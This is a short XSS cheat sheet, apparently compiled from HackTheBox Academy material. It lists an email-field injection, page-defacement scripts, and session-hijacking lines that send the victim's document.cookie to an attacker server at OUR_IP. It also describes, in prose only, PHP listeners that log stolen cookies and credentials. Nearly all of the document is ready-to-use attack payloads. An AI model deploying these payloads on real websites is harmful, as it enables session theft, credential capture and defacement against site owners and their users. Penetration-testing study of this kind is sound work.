List of useful XSS payloads, tips and tricks gathered over time
To be tried and inserted in email fields
"<img/src/onerror=alert(0)"@xss.com
Payloads List
Defacing
An attacker can take advantage of stored XSS to change the look of the web application and damage the company's website. Attackers may deface a website to prove that the target was compromised. Website defacement can have a significant impact on a company's business and affairs.
# Change page title
<script>document.title = 'HackTheBox Academy'</script>
# Change Background
<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
# Change page text
document.getElementById("todo").innerHTML = "New Text"
document.getElementsByTagName('body')[0].innerHTML = "New Text"
Session hijacking payloads
These payloads can be written in a script.js file hosted on the attacker's web server.
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
PHP payloads for session hijacking
This payload writes the victim's cookies, along with the associated IP, to a file. It can be saved in an index.php file hosted on the attacker's web server.
This payload looks for the username and password parameters in the URL and, if they exist, writes the username and password entered by the victim to a file named creds.txt. It then redirects the user to a legitimate page.